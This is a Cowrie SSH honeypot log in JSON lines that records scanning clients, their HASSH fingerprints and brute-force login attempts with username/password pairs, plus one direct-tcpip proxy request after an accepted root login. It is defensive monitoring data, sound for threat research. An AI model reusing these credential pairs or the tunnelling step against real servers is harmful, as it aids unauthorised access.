{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:18:40.450463Z","src_ip":"14.103.112.228","session":"57a00240fd46"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:18:41.252343Z","src_ip":"14.103.112.228","session":"57a00240fd46"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:41.444392Z","src_ip":"14.103.112.228","session":"57a00240fd46"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:41.452361Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":33331,"dst_ip":"1.2.3.4","dst_port":22,"session":"403f2354b1fc","protocol":"ssh","message":"New connection: 102.88.137.80:33331 (1.2.3.4:22) [session: 403f2354b1fc]","sensor":"my-vps","timestamp":"2025-08-31T01:18:44.352364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:18:44.353284Z","src_ip":"102.88.137.80","session":"403f2354b1fc"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:18:44.475539Z","src_ip":"102.88.137.80","session":"403f2354b1fc"}
{"eventid":"cowrie.login.failed","username":"vbox","password":"pass","message":"login attempt [vbox/pass] failed","sensor":"my-vps","timestamp":"2025-08-31T01:18:45.008068Z","src_ip":"102.88.137.80","session":"403f2354b1fc"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:46.134544Z","src_ip":"102.88.137.80","session":"403f2354b1fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51796,"dst_ip":"1.2.3.4","dst_port":22,"session":"60aa69c73969","protocol":"ssh","message":"New connection: 212.227.235.229:51796 (1.2.3.4:22) [session: 60aa69c73969]","sensor":"my-vps","timestamp":"2025-08-31T01:18:47.716126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:18:48.497790Z","src_ip":"212.227.235.229","session":"60aa69c73969"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:18:48.498515Z","src_ip":"212.227.235.229","session":"60aa69c73969"}
{"eventid":"cowrie.login.failed","username":"dev","password":"P@ssw0rd123","message":"login attempt [dev/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:18:54.475974Z","src_ip":"212.227.235.229","session":"60aa69c73969"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:56.557416Z","src_ip":"212.227.235.229","session":"60aa69c73969"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.235.219","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"91cedbffc474","protocol":"ssh","message":"New connection: 104.248.235.219:6103 (1.2.3.4:22) [session: 91cedbffc474]","sensor":"my-vps","timestamp":"2025-08-31T01:19:01.399125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-31T01:19:01.507824Z","src_ip":"104.248.235.219","session":"91cedbffc474"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T01:19:01.607147Z","src_ip":"104.248.235.219","session":"91cedbffc474"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T01:19:02.709189Z","src_ip":"104.248.235.219","session":"91cedbffc474"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:19:02.710710Z","src_ip":"104.248.235.219","session":"91cedbffc474"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42502,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a50cb550c63","protocol":"ssh","message":"New connection: 212.227.125.160:42502 (1.2.3.4:22) [session: 4a50cb550c63]","sensor":"my-vps","timestamp":"2025-08-31T01:19:10.047484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:19:10.523500Z","src_ip":"212.227.125.160","session":"4a50cb550c63"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:19:10.524632Z","src_ip":"212.227.125.160","session":"4a50cb550c63"}
{"eventid":"cowrie.login.failed","username":"dev","password":"P@ssw0rd123","message":"login attempt [dev/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:19:13.060620Z","src_ip":"212.227.125.160","session":"4a50cb550c63"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:19:15.844792Z","src_ip":"212.227.125.160","session":"4a50cb550c63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34256,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f53a908fcd7","protocol":"ssh","message":"New connection: 212.227.235.229:34256 (1.2.3.4:22) [session: 2f53a908fcd7]","sensor":"my-vps","timestamp":"2025-08-31T01:19:49.950882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:19:50.943063Z","src_ip":"212.227.235.229","session":"2f53a908fcd7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:19:50.944718Z","src_ip":"212.227.235.229","session":"2f53a908fcd7"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1191,"dst_ip":"1.2.3.4","dst_port":22,"session":"32ae7d553ccb","protocol":"ssh","message":"New connection: 102.88.137.80:1191 (1.2.3.4:22) [session: 32ae7d553ccb]","sensor":"my-vps","timestamp":"2025-08-31T01:19:54.960537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:19:54.961170Z","src_ip":"102.88.137.80","session":"32ae7d553ccb"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:19:55.090844Z","src_ip":"102.88.137.80","session":"32ae7d553ccb"}
{"eventid":"cowrie.login.failed","username":"openproject","password":"openproject","message":"login attempt [openproject/openproject] failed","sensor":"my-vps","timestamp":"2025-08-31T01:19:55.682074Z","src_ip":"102.88.137.80","session":"32ae7d553ccb"}
{"eventid":"cowrie.login.failed","username":"dev","password":"letmein","message":"login attempt [dev/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T01:19:56.804046Z","src_ip":"212.227.235.229","session":"2f53a908fcd7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:19:56.813301Z","src_ip":"102.88.137.80","session":"32ae7d553ccb"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:19:58.713741Z","src_ip":"212.227.235.229","session":"2f53a908fcd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53504,"dst_ip":"1.2.3.4","dst_port":22,"session":"4df4db0c21c5","protocol":"ssh","message":"New connection: 212.227.125.160:53504 (1.2.3.4:22) [session: 4df4db0c21c5]","sensor":"my-vps","timestamp":"2025-08-31T01:20:12.593343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:20:13.053556Z","src_ip":"212.227.125.160","session":"4df4db0c21c5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:20:13.054194Z","src_ip":"212.227.125.160","session":"4df4db0c21c5"}
{"eventid":"cowrie.login.failed","username":"dev","password":"letmein","message":"login attempt [dev/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T01:20:15.288210Z","src_ip":"212.227.125.160","session":"4df4db0c21c5"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:20:17.323230Z","src_ip":"212.227.125.160","session":"4df4db0c21c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49194,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d75a4c44b8b","protocol":"ssh","message":"New connection: 212.227.125.160:49194 (1.2.3.4:22) [session: 9d75a4c44b8b]","sensor":"my-vps","timestamp":"2025-08-31T01:20:19.515289Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:20:19.517237Z","src_ip":"212.227.125.160","session":"9d75a4c44b8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49478,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a75289f685f","protocol":"ssh","message":"New connection: 212.227.125.160:49478 (1.2.3.4:22) [session: 2a75289f685f]","sensor":"my-vps","timestamp":"2025-08-31T01:20:19.630795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:20:19.631502Z","src_ip":"212.227.125.160","session":"2a75289f685f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T01:20:19.746228Z","src_ip":"212.227.125.160","session":"2a75289f685f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:20:20.092385Z","src_ip":"212.227.125.160","session":"2a75289f685f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T01:20:20.207732Z","session":"2a75289f685f"}
{"eventid":"cowrie.session.connect","src_ip":"159.65.146.196","src_port":42136,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1c2420262f7","protocol":"ssh","message":"New connection: 159.65.146.196:42136 (1.2.3.4:22) [session: d1c2420262f7]","sensor":"my-vps","timestamp":"2025-08-31T01:20:28.863400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:20:28.864327Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
